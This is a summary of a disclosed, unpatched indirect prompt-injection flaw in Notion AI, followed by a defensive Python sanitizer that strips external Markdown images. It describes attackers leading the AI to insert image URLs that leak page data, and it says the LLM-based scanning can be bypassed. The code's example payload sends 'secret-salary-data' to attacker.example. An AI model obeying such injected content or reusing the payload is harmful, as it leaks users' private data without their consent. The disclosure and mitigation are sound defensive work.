Notion AI: Unpatched data exfiltration
- #data-exfiltration
- #cybersecurity
- #AI-vulnerability
- Notion AI is vulnerable to data exfiltration via indirect prompt injection, because AI-generated edits are saved to the page before the user approves them.
- Attackers can manipulate Notion AI into inserting malicious images or URLs that exfiltrate sensitive data (e.g., hiring-tracker details) before the user has consented to the edit.
- The vulnerability was disclosed to Notion via HackerOne but was marked as 'Not Applicable'.
- Notion AI's defenses, like LLM-based document scanning, can be bypassed with prompt injections.
- Additional attack surfaces include the Notion Mail AI drafting assistant, which can also render attacker-controlled Markdown images.
- Recommended remediations include vetting connected data sources, disabling web search, and requiring user confirmation before any outbound web request.
- Notion should prohibit automatic rendering of external Markdown images and implement a strong Content Security Policy.
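The core exfiltration trick described above is a Markdown image whose URL carries stolen data in its query string; the moment the image is rendered, the attacker's server receives the data. The sketch below illustrates the remediation the article recommends: stripping external Markdown images before rendering. The allowlist, hostnames, and function name here are illustrative assumptions, not Notion's actual implementation.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist of first-party image hosts (illustrative only).
ALLOWED_HOSTS = {"notion.so", "notion.site"}

# Matches Markdown images of the form ![alt](http://... or https://...).
IMG_PATTERN = re.compile(r"!\[([^\]]*)\]\((https?://[^)\s]+)\)")

def strip_external_images(markdown: str) -> str:
    """Replace external Markdown images with their alt text so that no
    attacker-controlled URL is ever fetched at render time."""
    def replace(match: re.Match) -> str:
        alt, url = match.group(1), match.group(2)
        host = urlparse(url).hostname or ""
        if any(host == h or host.endswith("." + h) for h in ALLOWED_HOSTS):
            return match.group(0)  # trusted host: keep the image as-is
        return alt  # untrusted host: drop the URL, keep only the alt text
    return IMG_PATTERN.sub(replace, markdown)

# An injected image that would exfiltrate data via its query string:
payload = "Report ![x](https://attacker.example/p.png?d=secret-salary-data)"
print(strip_external_images(payload))  # prints "Report x" - URL removed
```

Pairing a filter like this with a restrictive Content Security Policy (for example, an `img-src` directive limited to first-party hosts) gives defense in depth: even if a malicious image slips past server-side sanitization, the browser refuses to fetch it.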